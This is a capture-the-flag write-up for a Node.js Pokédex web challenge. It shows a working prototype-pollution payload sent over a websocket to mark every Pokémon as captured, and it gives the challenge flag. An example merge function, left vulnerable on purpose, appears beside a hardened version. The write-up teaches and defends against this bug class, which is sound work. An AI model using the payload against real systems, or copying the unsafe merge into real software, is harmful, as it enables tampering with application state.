write-ups-challenges-2020-2021/gotta_catch_em_all/README.md
2022-11-24 18:03:20 +01:00


Gotta Catch 'em All! (Really Fast)

Text

I am an aspiring new Pokémon trainer that is ready to explore the world and catch many Pokémon. Unfortunately, due to the COVID pandemic, everything will be going digital now. Professor Oak made us a game to play instead, and developed this Pokédex website to register all the Pokémon we caught in the game.

Gary, my rival, bragged to me that he managed to complete the entire Pokédex in under a minute. He probably didn't play the game at all and just selected all the Pokémon on the Pokédex. Whatever the case may be, I intend to beat him, legitimately or not.

The website is connected to a NodeJS backend with a web socket that keeps track of the Pokédex and its completion. Somehow, I must fool the backend into believing I captured all Pokémon in an insanely fast time, without looking too suspicious. And knowing Professor Oak's programming skills and the fact that it's written in JavaScript, there's probably some kind of vulnerability I can abuse.

How To Solve

Difficulty: Advanced

There is a hint given when adding Poison-type Pokémon that there's a bug caused by the poison of the Pokémon that affects the shared prototype. You have to use prototype poisoning to inject the value "captured: true" into the shared prototype of all Pokémon (which is 2 levels up), or, alternatively, inject the property on each of the different Pokémon type prototypes (grass, water, fire, etc.):

webSocket.send('{"msg": "updatePokedex", "data": {"pokemon": "Bulbasaur", "values": {"__proto__": {"__proto__": {"captured": true}}}}}')
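The bug class behind that payload, as an added example that is not the challenge's actual server code: a naive recursive merge that climbs `__proto__` next to a hardened one that refuses it. The Pokédex layout (each Pokémon under a per-type prototype under one shared prototype) and all function names are assumptions.

```javascript
// Added example (not the challenge's real server code): a minimal model of the
// bug class above. Each Pokémon inherits from a per-type prototype, which inherits
// from one shared prototype, so from Bulbasaur "__proto__.__proto__" is that shared object.
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
function makePokedex() {
  const shared = { captured: false };
  const grass = Object.create(shared), water = Object.create(shared);
  return { Bulbasaur: Object.create(grass), Squirtle: Object.create(water) };
}

// Vulnerable: a naive recursive merge treats "__proto__" like any other key, so
// target["__proto__"] resolves to the prototype and the walk climbs the chain.
function mergeUnsafe(target, values) {
  for (const key in values) {
    const v = values[key];
    if (v && typeof v === 'object') {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      mergeUnsafe(target[key], v);
    } else target[key] = v;
  }
  return target;
}

// Hardened: only own keys, prototype-related names refused, recursion only into
// objects the target itself owns (never into inherited ones).
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function mergeSafe(target, values) {
  for (const key of Object.keys(values)) {
    if (FORBIDDEN.has(key)) continue;
    const v = values[key];
    if (v && typeof v === 'object' && !Array.isArray(v)) {
      if (!hasOwn(target, key) || typeof target[key] !== 'object') target[key] = {};
      mergeSafe(target[key], v);
    } else target[key] = v;
  }
  return target;
}

// Apply one "updatePokedex" websocket message (raw JSON text) using `merge`.
function applyUpdate(pokedex, rawJson, merge) {
  const { msg, data } = JSON.parse(rawJson);
  if (msg !== 'updatePokedex' || !hasOwn(pokedex, data.pokemon)) return pokedex;
  merge(pokedex[data.pokemon], data.values);
  return pokedex;
}

// How many Pokémon currently read as captured, own or inherited.
function countCaptured(pokedex) {
  return Object.values(pokedex).filter((p) => p.captured === true).length;
}
```

With the unsafe merge, the message above marks every Pokémon captured through the shared prototype; with the safe merge it changes nothing, while an honest update of a single Pokémon's own `captured` property still works.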

Flag

IGCTF{MissingNo}